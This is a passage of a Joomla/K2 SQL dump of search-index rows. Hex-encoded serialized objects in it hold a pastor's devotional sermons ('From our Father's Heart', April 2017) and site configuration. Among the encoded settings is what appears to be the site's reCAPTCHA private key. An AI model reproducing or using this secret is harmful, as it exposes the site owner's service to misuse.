6f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223135223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2234333a66726f6d2d6f75722d6661746865722d732d68656172742d31362d30342d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f34332d66726f6d2d6f75722d6661746865722d732d68656172742d31362d30342d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3433223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d34333a66726f6d2d6f75722d6661746865722d732d68656172742d31362d30342d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202831362f30342f3230313729223b733a31313a226465736372697074696f6e223b733a3430393a2220446561726c792042656c6f766564204c657420476f64206c69676874656e20796f75722063616e646c652e204e65766572206a6f6b65207769746820796f757220696e74696d616379207769746820476f642e204e6f206d617474657220686f77206275737920796f75206765742c20646f6e2774206c6f736520796f75722074696d652077697468204a657375732e20496e74696d616379207769746820746865204c6f726420697320736f20766974616c20746f20796f75722077616c6b696e6720616e64206c6976696e6720696e2074686520657870657269656e636573206f66207468652062656c696576657220696e206c6966652e20496e74696d61637920697320706572736f6e616c2e2054686f75676820617661696c61626c652c20696e74696d6163792069732073656c662d67656e6572617465643b206e6f206f6e652063616e20646f20697420666f7220796f752c20796f75206d75737420646f20697420796f757273656c662e2049742069732073656c662d63756c7469766174656420616e642064656c696265726174652e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30342d31362031383a32313a3531223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30342d31362031383a32313a3531223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(268, 'index.php?option=com_k2&view=item&id=44', 'index.php?option=com_k2&view=item&id=44:from-our-father-s-heart-23-04-2017', 'From our Father\'s Heart (23/04/2017)', ' Dearly Beloved, Quit Worrying! Stop worrying about too many issues. Worry is a negative emotion and negative emotion gets you out of the zone of creativity and inspiration. Worry and worrying is not God\'s way of solving your problems or bringing solutions to matters. Worry magnifies the problems, and also enlarges the fact that the problem is impossible to be solved. ', '2017-06-25 14:19:42', '3be46f27924783d8fe416f27787ebf41', 1, 1, 1, '*', '2017-04-23 15:38:00', '0000-00-00 00:00:00', '2017-04-23 15:38:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223434223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d32332d30342d32303137223b733a373a2273756d6d617279223b733a3339343a223c703e446561726c792042656c6f7665642c3c2f703e0d0a3c703e5175697420576f727279696e67213c2f703e0d0a3c703e53746f7020776f727279696e672061626f757420746f6f206d616e79206973737565732e20576f7272792069732061206e6567617469766520656d6f74696f6e20616e64206e6567617469766520656d6f74696f6e206765747320796f75206f7574206f6620746865207a6f6e65206f66206372656174697669747920616e6420696e737069726174696f6e2e20576f72727920616e6420776f727279696e67206973206e6f7420476f64277320776179206f6620736f6c76696e6720796f75722070726f626c656d73206f72206272696e67696e6720736f6c7574696f6e7320746f206d6174746572732e20576f727279206d61676e6966696573207468652070726f626c656d732c20616e6420616c736f20656e6c61726765732074686520666163742074686174207468652070726f626c656d20697320696d706f737369626c6520746f20626520736f6c7665642e3c2f703e0d0a223b733a343a22626f6479223b733a323632303a220d0a3c703e5768656e6576657220796f7520776f7272792061626f75742061206d61747465722c20796f75206c6f736520746865206372656174697669747920656d62656464656420696e20796f757220726567656e6572617465642068756d616e2073706972697420746f20736f6c7665207468652070726f626c656d732e2049207573656420746f2062652061206368616d70696f6e20776f72726965722c20746861742069732c2049207573656420746f20776f7272792061206c6f742c20756e74696c20476f642073686f776564206d652074686973205363726970747572652e3c2f703e0d0a3c703e4d61747468657720363a3235e2809332373c2f703e0d0a3c703e323520e2809c5468657265666f726520492073617920746f20796f752c20646f206e6f7420776f7272792061626f757420796f7572206c6966652c207768617420796f752077696c6c20656174206f72207768617420796f752077696c6c206472696e6b3b206e6f722061626f757420796f757220626f64792c207768617420796f752077696c6c20707574206f6e2e204973206e6f74206c696665206d6f7265207468616e20666f6f6420616e642074686520626f6479206d6f7265207468616e20636c6f7468696e673f3c2f703e0d0a3c703e3236204c6f6f6b20617420746865206269726473206f6620746865206169722c20666f722074686579206e65697468657220736f77206e6f722072656170206e6f722067617468657220696e746f206261726e733b2079657420796f75722068656176656e6c7920466174686572206665656473207468656d2e2041726520796f75206e6f74206f66206d6f72652076616c7565207468616e20746865793fc2a03c2f703e0d0a3c703e3237205768696368206f6620796f7520627920776f727279696e672063616e20616464206f6e6520637562697420746f2068697320737461747572653f3c2f703e0d0a3c703e4f6e65207468696e67204920736f206d756368206c6f76652061626f7574206d7920776966652c205265762e20284d727329204172656f67756e2c20697320746861742073686520646f6573206e6f7420776f7272792061626f757420616e797468696e672e204f6e63652049276d2061726f756e642c207368652073746179732063616c6d20616e6420646f6573206e6f7420776f7272792e2042656c6f7665642c206e6f20776f727279696e6720646f65736e2774206d65616e20796f75206265636f6d65206972726573706f6e7369626c65206f722063617265667265652061626f757420736572696f7573206d6174746572732c206e6f2e204974206d65616e7320796f7520617265207368757474696e67206f75742074686174206e6567617469766520656d6f74696f6e207468617420726f627320796f7572206d696e64206f6620697473206372656174697669747920616e6420796f75206172652061637469766174696e672074686520776f726b696e67206f662074686520486f6c792047686f737420696e7369646520796f7520746f206272696e67206120736f6c7574696f6e2e20536f6d6574696d65732c20696e7374656164206f6620776f727279696e672077687920646f6e277420796f752067657420696e746f20616e20616e6f696e7465642064697363757373696f6e206f76657220746865206d617474657220776974682074686520616e6f696e7465642061726f756e6420796f75206f722073746172742070726179696e6720696e2074686520486f6c792047686f7374206f76657220746865206d61747465722e3c2f703e0d0a3c703e5768656e657665722061206d61747465722074686174207365656d7320646966666963756c7420636f6d65732075702c20492072656675736520746f20626520776f72726965642c2049207072617920696e2074686520537069726974206f76657220697420616e6420616e737765727320626567696e20746f20726973652075702066726f6d2077697468696e206d79207370697269743b20697420646f6573206e6f74206661696c2e20536f6d6574696d657320492063616c6c206d7920776966652c207765206469736375737320746865206d617474657220616e6420616e737765727320616e6420736f6c7574696f6e7320626567696e20746f20666c6f772ec2a03c2f703e0d0a3c703e496620796f752066696e6420796f757273656c6620776f727279696e67206f7665722061206d61747465722c20706c65617365206e6f746520746861742074686520646576696c2069732061626f757420746f207472617020796f7520696e746f206120636f726e6572206f6620696d706f73736962696c6974792c20736f20666967687420746f20657363617065206265666f726520697420697320746f6f206c6174652e204861766520796f75206e6f7420666f756e64206f7574207468617420796f757220776f727374206665617273206861766520616c776179732068617070656e656420696e206d617474657273207468617420796f752068617665206265656e20736f20776f72726965642061626f75743f204861766520796f75206e6f7420646973636f7665726564207468617420796f757220776f727279696e6720686173206e6576657220736f6c76656420616e792070726f626c656d2c2072617468657220697420686173206d61646520796f75206d6f72652066616974686c65737320616e6420646973636f75726167656420616e64206576656e206d6f7265207369636b6c7920696e20796f757220626f64792ec2a03c2f703e0d0a3c703e42656c6f7665642c207175697420776f727279696e6721204974206973206120736174616e696320747261702e205468617420796f7520776f72727920646f65736e2774206d65616e20796f752061726520726573706f6e7369626c652c2074686f75676820776f727279696e6720676976657320612066616c73652073656e7365206f6620726573706f6e736962696c6974792e204f70656e20796f7572206d696e6420746f2074686520486f6c792053706972697420616e64206c657420776f7272792066616465206f757420736f20746861742074686520486f6c79205370697269742063616e206d616b6520796f752063726561746976652e20596f757220736974756174696f6e206f6e6c79206765747320776f727365207768656e20796f7520776f7272792c20616e6420796f7520676574206120736f6c7574696f6e207768656e20796f75207475726e206974206f76657220746f20476f6420627920616c6c6f77696e672074686520486f6c79205370697269742068656c7020796f752ec2a03c2f703e0d0a3c703e4c657420476f6420696e206f6e20746865206d61747465723b20676976652074686520486f6c792053706972697420726f6f6d20746f20776f726b206f6e2069742e3c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375733c2f703e0d0a3c703e476f6427732053657276616e742c3c2f703e0d0a3c703e5265762e204f6c75736f6c61204172656f67756e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30352d31342031353a35353a3130223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6